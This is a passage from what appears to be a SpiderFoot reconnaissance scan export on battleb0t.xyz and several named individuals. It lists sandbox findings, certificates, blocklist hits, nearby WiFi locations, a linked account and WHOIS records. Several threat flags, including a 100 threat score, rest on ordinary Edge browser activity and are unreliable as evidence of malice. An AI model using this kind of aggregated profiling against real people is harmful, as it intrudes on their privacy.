u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:1892:120:WilError_01"\n "Local\\SM0:2444:120:WilError_01"\n "Local\\SM0:2444:304:WilStaging_02"\n "SM0:2444:120:WilError_01"\n "InternetShortcutMutex"\n "ChromeProcessSingletonStartup!"\n "SM0:1892:304:WilStaging_02"\n "Local\\SM0:1892:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\HKEY_LOCAL_MACHINE_SOFTWARE_Microsoft_Speech_OneCore_Voices_Tokens_MSTTS_V110_enUS_DavidM_Mutex"\n 
"\\Sessions\\1\\BaseNamedObjects\\HKEY_LOCAL_MACHINE_SOFTWARE_Microsoft_Speech_OneCore_Voices_Tokens_MSTTS_V110_enUS_MarkM_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\HKEY_LOCAL_MACHINE_SOFTWARE_Microsoft_Speech_OneCore_Voices_Tokens_MSTTS_V110_enUS_ZiraM_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:1892:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:1892:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:1892:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\ChromeProcessSingletonStartup!"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"54.215.114.29:443"\n "13.227.74.39:443"\n "172.64.143.38:443"\n "52.223.40.198:443"\n "13.227.77.47:443"\n "13.227.74.67:443"\n "142.251.2.157:443"\n "13.227.74.85:443"\n "13.227.74.30:443"\n "104.18.34.10:443"\n "104.22.53.86:443"\n "18.235.185.19:443"\n "54.186.215.15:443"\n "184.26.129.51:443"\n "104.18.25.185:443"\n "13.227.78.117:443"\n "74.119.118.151:443"\n "54.67.2.147:443"\n "35.227.252.103:443"\n "172.67.72.66:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"a.teads.tv"\n "a177a0690a0ac8223a5887b6f44f3a4f.safeframe.googlesyndication.com"\n "aax.amazon-adsystem.com"\n "acdn.adnxs.com"\n "acds.prod.vidible.tv"\n "ad.doubleclick.net"\n "ads.adthrive.com"\n "adx.g.doubleclick.net"\n "api.rlcdn.com"\n "ats.rlcdn.com"\n "bidder.criteo.com"\n "btlr.sharethrough.com"\n "c.amazon-adsystem.com"\n "c2shb.pubgw.yahoo.com"\n 
"c2shb.ssp.yahoo.com"\n "cdn.ampproject.org"\n "cdn.brandmetrics.com"\n "cdn.confiant-integrations.net"\n "cdn.id5-sync.com"\n "cdn.jwplayer.com"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- [targetUID: N/A]\n "data_2" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\ShaderCache\\data_2]- [targetUID: 00000000-00001892]\n "2cebbc13-a880-451d-8f90-183cd02c69f7.tmp" has type "gzip compressed data from FAT filesystem (MS-DOS OS/2 NT) original size modulo 2^32 366884"- [targetUID: N/A]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\ShaderCache\\data_1]- [targetUID: 00000000-00001892]\n "000009.log" has type "data"- [targetUID: N/A]\n "000013.ldb" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\EdgeCoupons\\coupons_data.db\\000013.ldb]- [targetUID: 00000000-00001892]\n "4adfb1408c1f9cb9_0" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\4adfb1408c1f9cb9_0]- [targetUID: 00000000-00001892]\n "000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Site Characteristics Database\\000003.log]- [targetUID: 00000000-00001892]\n "load_statistics.db" has type "SQLite 3.x database last written using SQLite version 3039003"- [targetUID: N/A]\n "Session_13325706525672020" has type "data"- [targetUID: N/A]\n "508ed6539f911a22_0" has type "data"- [targetUID: N/A]\n "000014.ldb" has type "data"- [targetUID: N/A]\n "de7d83af72dd8e77_0" has type "data"- [targetUID: N/A]\n "f_0004d7" has type "gzip compressed data from Unix original size modulo 2^32 
763040"- [targetUID: N/A]\n "History" has type "SQLite 3.x database last written using SQLite version 3039003"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\History]- [targetUID: 00000000-00002444]\n "9b2c1c9dc80fc2b3_0" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\9b2c1c9dc80fc2b3_0]- [targetUID: 00000000-00001892]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-6', u'name': u'Contacts random domain names', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 5, u'threat_level': 0, u'type': 7, u'description': u'"cdn.jwplayer.com" seems to be random\n "direct.adsrvr.org" seems to be random\n "g2.gumgum.com" seems to be random\n "lb.eu-1-id5-sync.com" seems to be random'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://pickerwheel.com/"\n Pattern match: "https://pickerwheel.com"\n Pattern match: "www.playstation.com},{applied_policy:block,domain:bing.com},{applied_policy:block,domain:browserbench.org},{applied_policy:block,domain:www.principledtechnologies.com},{applied_policy:block,domain:web.basemark.com},{applie"\n Pattern match: "https://acdn.adnxs.com/video/outstream/ANOutstreamVideo.jsaD`D`\xaeD`Q"\n Pattern match: "https://acdn.adnxs.com/video/outstream/ANOutstreamVideo.jsaD`D`D`Q"\n Pattern match: "http://modern.ie"\n Pattern match: "http://www.patternify.com"\n Pattern match: "http://designer.videojs.com/"\n Pattern match: "http://www.cssplay.co.uk/layouts/fixed.html"\n Pattern match: 
"https://github.com/videojs/video.js/blob/master/src/css/video-js.less"\n Pattern match: "http://www.w3.org/TR/NOTE-datetime"\n Pattern match: "http://www.pelagodesign.com/blog/2009/05/20/iso-8601-date-validation-that-doesnt-suck/"\n Pattern match: "https://msdn.microsoft.com/en-us/library/ms537509(v=vs.85).aspx"\n Pattern match: "https://github.com/petkaantonov/bluebird/wiki/Optimization-killers#32-leaking-arguments"\n Pattern match: "https://msdn.microsoft.com/en-us/library/cc288060(v=vs.85).aspx"\n Pattern match: "http://bugs.jquery.com/ticket/1450"\n Pattern match: "http://msdn.microsoft.com/en-us/library/ie/cc196988(v=vs.85).aspx"\n Pattern match: "https://github.com/angular/angular.js/blob/master/src/ng/urlUtils.js"\n Pattern match: "http://www.aptana.com/reference/html/api/HTMLAnchorElement.html"\n Pattern match: "http://stackoverflow.com/a/472729"\n Pattern match: "http://developer.mozilla.org/en-US/docs/Web/API/HTMLAnchorElement"\n Pattern match: "http://url.spec.whatwg.org/#urlutils"\n Pattern match: "https://github.com/angular/angular.js/pull/2902"\n Pattern match: "http://james.padolsey.com/javascript/parsing-urls-with-the-dom/"\n Pattern match: "http://www.w3.org/1999/xhtml"\n Pattern match: "https://stash.corp.appnexus.com/projects/VIDEO/repos/resources_video-ad-video-player-html5-plugin-vpaid/pull-requests/14/overview"\n Pattern match: "acdn.adnxs-simple.com/video/static/res/b2.mp4$Sy"\n Pattern match: "acdn.adnxs-simple.com/video/static/res/av2.mp4$a"\n Pattern match: "rb.adnxs-simple.com/pack?log=log_rb_video_waterfall_events&format=json$Sy"\n Pattern match: "rb.adnxs-simple.com/pack?log=log_rb_video_outstream&format=json$Sy"\n Heuristic match: "a.teads.tv"\n Heuristic match: "a177a0690a0ac8223a5887b6f44f3a4f.safeframe.googlesyndication.com"\n Heuristic match: "aax.amazon-adsystem.com"\n Heuristic match: "acdn.adnxs.com"\n Heuristic match: "acds.prod.vidible.tv"\n Heuristic match: "ad.doubleclick.net"\n Heuristic match: "ads.adthrive.com"\n 
Heuristic match: "adx.g.doubleclick.net"\n Heuristic match: "api.rlcdn.com"\n Heuristic match: "ats.rlcdn.com"\n Heuristic match: "bidder.criteo.com"\n Heuristic match: "btlr.sharethrough.com"\n Heuristic match: "c.amazon-adsystem.com"\n Heuristic match: "c2shb.pubgw.yahoo.com"\n Heuristic match: "c2shb.ssp.yahoo.com"\n Heuristic match: "cdn.ampproject.org"\n Heuristic match: "cdn.brandmetrics.com"\n Heuristic match: "cdn.confiant-integrations.net"\n Heuris | 35.229.48.116 |
| 2023-05-12 02:47:48 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 18, u'threat_score': 100, u'compromised_hosts': [u'185.199.108.153'], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'http://www.travismathison.com:8080/assets/js/data/search.json', u'signatures': [{u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "widevinecdm.dll" as clean (type is "PE32+ executable (DLL) (console) x86-64 for MS Windows"), Antivirus vendors marked dropped file "Part-RU" as clean (type is "DOS executable (COM)")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.110.153:49731"\n "185.199.108.153:49737"\n "185.199.111.153:49743"\n "185.199.109.153:49752"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:2964:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:2964:120:WilError_01"\n "Local\\InternetShortcutMutex"\n "Local\\SM0:7576:304:WilStaging_02"\n "Local\\SM0:7576:120:WilError_01"\n "Local\\SM0:2964:120:WilError_01"\n 
"Local\\SM0:2964:304:WilStaging_02"\n "Local\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:3724:304:WilStaging_02"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"www.travismathison.com"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-33', u'name': u'Drops executable files inside temp directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"Part-RU" has type "DOS executable (COM)"- Location: [%TEMP%\\2964_441367473\\Part-RU]- [targetUID: 00000000-00002964]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"widevinecdm.dll" has type "PE32+ executable (DLL) (console) x86-64 for MS Windows"- Location: [%PROGRAMFILES%\\(x86)\\Microsoft\\Edge\\Application\\103.0.1264.37\\WidevineCdm\\_platform_specific\\win_x64\\widevinecdm.dll]- [targetUID: 00000000-00002964]\n "000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Sync Data\\LevelDB\\000003.log]- [targetUID: 00000000-00002964]\n "331833fe-aa24-4a32-a4fb-ef3c19aa8c0c.tmp" has type "ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User 
Data\\Default\\Network\\331833fe-aa24-4a32-a4fb-ef3c19aa8c0c.tmp]- [targetUID: 00000000-00002288]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00002964]\n "Part-NL" has type "PGP symmetric key encrypted data -"- Location: [%TEMP%\\2964_441367473\\Part-NL]- [targetUID: 00000000-00002964]\n "Part-RU" has type "DOS executable (COM)"- Location: [%TEMP%\\2964_441367473\\Part-RU]- [targetUID: 00000000-00002964]\n "Session_13319115991286099" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Sessions\\Session_13319115991286099]- [targetUID: 00000000-00002964]\n "settings.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Crashpad\\settings.dat]- [targetUID: 00000000-00002964]\n "Last Browser" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Last Browser]- [targetUID: 00000000-00002964]\n "widevinecdm.dll.sig" has type "data"- Location: [%TEMP%\\2964_842337331\\_platform_specific\\win_x64\\widevinecdm.dll.sig]- [targetUID: 00000000-00002964]\n "crl-set" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\CertificateRevocation\\6498.2022.5.1\\crl-set]- [targetUID: 00000000-00002964]\n "manifest.fingerprint" has type "ASCII text with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\CertificateRevocation\\6498.2022.5.1\\manifest.fingerprint]- [targetUID: 00000000-00002964]\n "31695c7e-2be1-4080-af62-904e1deee83c.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\31695c7e-2be1-4080-af62-904e1deee83c.tmp]- [targetUID: 00000000-00002964]\n "Part-ZH" has type "data"- Location: [%TEMP%\\2964_441367473\\Part-ZH]- [targetUID: 00000000-00002964]\n "46b20db5-be50-4bf4-b4f6-d1b4b39f1117.tmp" has type "UTF-8 Unicode text with 
very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\46b20db5-be50-4bf4-b4f6-d1b4b39f1117.tmp]- [targetUID: 00000000-00002964]\n "verified_contents.json" has type "JSON data"- Location: [%TEMP%\\2964_1124322810\\_metadata\\verified_contents.json]- [targetUID: 00000000-00002964]\n "shopping_fre.html" has type "HTML document ASCII text with CRLF line terminators"- Location: [%TEMP%\\2964_812909146\\shopping_fre.html]- [targetUID: 00000000-00002964]\n "LOG" has type "ASCII text"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Sync Data\\LevelDB\\LOG]- [targetUID: 00000000-00002964]\n "c53b5902-6f05-4039-9ca9-9a0b2029a141.tmp" has type "very short file (no magic)"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\c53b5902-6f05-4039-9ca9-9a0b2029a141.tmp]- [targetUID: 00000000-00002964]\n "Variations" has type "JSON data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Variations]- [targetUID: 00000000-00002964]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://www.travismathison.com:8080/assets/js/data/search.json"\n Pattern match: "http://www.travismathison.com"\n Pattern match: "www.travismathison.com"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-1', u'name': u'Sample was identified as clean by Antivirus engines', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 12, u'description': u'0/90 Antivirus vendors marked sample as malicious (0% detection rate)'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-35', 
u'name': u'Drops script files inside temp directory', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 1, u'type': 8, u'description': u'Dropped file: "shoppingfre.js" - Location: [%TEMP%\\2964_812909146\\shoppingfre.js]- [targetUID: 00000000-00002964]\n Dropped file: "auto_open_controller.js" - Location: [%TEMP%\\2964_812909146\\auto_open_controller.js]- [targetUID: 00000000-00002964]\n Dropped file: "shopping_iframe_driver.js" - Location: [%TEMP%\\2964_812909146\\shopping_iframe_driver.js]- [targetUID: 00000000-00002964]\n Dropped file: "product_page.js" - Location: [%TEMP%\\2964_812909146\\product_page.js]- [targetUID: 00000000-00002964]\n Dropped file: "edge_checkout_page_validator.js" - Location: [%TEMP%\\2964_812909146\\edge_checkout_page_validator.js]- [targetUID: 00000000-00002964]\n Dropped file: "edge_confirmation_page_validator.js" - Location: [%TEMP%\\2964_812909146\\edge_confirmation_page_validator.js]- [targetUID: 00000000-00002964]\n Dropped file: "adblock_snippet.js" - Location: [%TEMP%\\2964_441367473\\adblock_snippet.js]- [targetUID: 00000000-00002964]\n Dropped file: "edge_tracking_page_validator.js" - Location: [%TEMP%\\2964_812909146\\edge_tracking_page_validator.js]- [targetUID: 00000000-00002964]'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-43', u'name': u'Writes a PE file header to disc', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 1, u'type': 6, u'description': u'"msedge.exe" wrote 8192 bytes starting with PE header signature to file "%TEMP%\\2964_842337331\\_platform_specific\\win_x64\\widevinecdm.dll": 
4d5a78000100000004000000000000000000000000000000400000000000000000000000000000000000000000000000000000000000000000000000780000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e2400005045000064ff0a00 ...'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-1', u'name': u'Drops executable files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 10, u'threat_level': 1, u'type': 8, u'description': | 185.199.111.153 |
| 2023-05-12 03:03:19 | Internet Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | kekw.battleb0t.xyz | [{u'not_after': u'2023-06-25T13:22:32', u'not_before': u'2023-03-27T13:22:33', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'038880c39ce1f505d4ceeba7b88b966916e7', u'entry_timestamp': u'2023-03-27T14:22:33.489', u'id': 9021136086}, {u'not_after': u'2023-06-25T13:22:32', u'not_before': u'2023-03-27T13:22:33', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'038880c39ce1f505d4ceeba7b88b966916e7', u'entry_timestamp': u'2023-03-27T14:22:33.221', u'id': 9002142810}, {u'not_after': u'2023-06-11T12:52:04', u'not_before': u'2023-03-13T12:52:05', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'0323361a726efc710949b135f9b5e52880de', u'entry_timestamp': u'2023-03-13T13:52:05.523', u'id': 8910975043}, {u'not_after': u'2023-06-11T12:52:04', u'not_before': u'2023-03-13T12:52:05', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'0323361a726efc710949b135f9b5e52880de', u'entry_timestamp': u'2023-03-13T13:52:05.327', u'id': 8879939167}, {u'not_after': u'2023-04-27T17:58:42', u'not_before': u'2023-01-27T17:58:43', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'0353521f2268d4e4bd04c1ea37aeda35a438', u'entry_timestamp': u'2023-01-27T18:58:43.373', u'id': 8595002735}, {u'not_after': u'2023-04-27T17:58:42', u'not_before': u'2023-01-27T17:58:43', u'issuer_ca_id': 183267, 
u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'0353521f2268d4e4bd04c1ea37aeda35a438', u'entry_timestamp': u'2023-01-27T18:58:43.278', u'id': 8512878872}, {u'not_after': u'2023-03-18T21:24:58', u'not_before': u'2022-12-18T21:24:59', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'036227a6dc1628deaea0a47d7ea00281250e', u'entry_timestamp': u'2022-12-18T22:24:59.851', u'id': 8238674246}, {u'not_after': u'2023-03-18T21:24:58', u'not_before': u'2022-12-18T21:24:59', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'036227a6dc1628deaea0a47d7ea00281250e', u'entry_timestamp': u'2022-12-18T22:24:59.092', u'id': 8232262063}] |
| 2023-05-12 03:24:33 | Malicious Affiliate | Yes | VXVault.net | 0 | 1 | 4 | 0 | None | VXVault Malicious URL List [cdn-185-199-111-154.github.com]
http://vxvault.net/URL_List.php | cdn-185-199-111-154.github.com |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | DTLAMN (Net ID: 00:01:9F:20:3C:A0) | 34.0544, -118.244 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | TOMTSSID (Net ID: 00:02:2D:21:5D:E4) | 50.1188, 8.6843 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | cf-ray: 7c5f605affff189d-EWR | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "cf-cache-status": "MISS", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "etag": "W/\"8c335e8962efa39b56919d96c0b5527b\"", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=sZlRfK%2B18hvKHsoLJ40BkYB4lHX60aBHph6G1vTBEuSHhMJnpf00BL3raGeVno%2B26HQG4%2BW6ctKHKalYOpr00wtWKpk2uf4%2BwHegHXg02iluCPfF38%2B%2FPJX8%2B4PjVD4UW5HjHU9e\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=14400, must-revalidate", "date": "Fri, 12 May 2023 02:54:19 GMT", "access-control-allow-origin": "*", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "application/javascript", "cf-ray": "7c5f605affff189d-EWR"} |
| 2023-05-12 02:44:03 | Internal SpiderFoot Root event | No | SpiderFoot UI | 12 | 0 | 0 | 0 | None | "Battleb0t","Kekwltd","Patrick Pogoda","DawixSulej","Dawid Sulej","ayshoo",battleb0t.xyz,"_BattleB0t_",ayhu.xyz | "Battleb0t","Kekwltd","Patrick Pogoda","DawixSulej","Dawid Sulej","ayshoo",battleb0t.xyz,"_BattleB0t_",ayhu.xyz |
| 2023-05-12 02:44:15 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 1 | 2 | 0 | None | netlify.app | pics.battleb0t.xyz |
| 2023-05-12 03:10:20 | Malicious IP on Same Subnet | Yes | VoIPBL OpenPBX IPs | 0 | 0 | 3 | 0 | None | VOIPBL Publicly Accessible PBX List [188.114.97.0/24]
http://www.voipbl.org/update | 188.114.97.0/24 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | TheCs (Net ID: 00:09:0F:BC:AB:26) | 39.0469, -77.4903 |
| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | cross-origin-opener-policy: same-origin | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=VywvBB1i7auboS6du2SyYTMISxYgv0SAv9G2irfzrfSoLR0rWIxDql%2BDKBWgGtLF7kP8CwfOUwVMXmcuqTKfEc1L%2Fjta42Of8JEwGnOgDhCKAOR2s74ejvfrFg%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:22 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c5eeb1a42bf-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Beens Gast (Net ID: 00:01:21:1F:B1:91) | 52.3759, 4.8975 |
| 2023-05-12 03:23:41 | Account on External Site | No | Account Finder | 0 | 0 | 8 | 0 | None | Pillowfort (Category: social)
https://www.pillowfort.social/baptiste.vauthey | baptiste.vauthey |
| 2023-05-12 02:58:35 | Phone Number | No | Phone Number Extractor | 0 | 0 | 2 | 0 | None | +74955801111 | Domain Name: BATTLEB0T.XYZ
Registry Domain ID: D333902916-CNIC
Registrar WHOIS Server: whois.reg.ru
Registrar URL: https://www.reg.ru/
Updated Date: 2023-01-15T21:30:02.0Z
Creation Date: 2022-11-17T08:43:43.0Z
Registry Expiry Date: 2023-11-17T23:59:59.0Z
Registrar: Registrar of Domain Names REG.RU, LLC
Registrar IANA ID: 1606
Domain Status: ok https://icann.org/epp#ok
Registrant Organization: Privacy Protection
Registrant State/Province:
Registrant Country: RU
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: DAPHNE.NS.CLOUDFLARE.COM
Name Server: SKIP.NS.CLOUDFLARE.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@reg.ru
Registrar Abuse Contact Phone: +7.4955801111
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T02:44:05.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
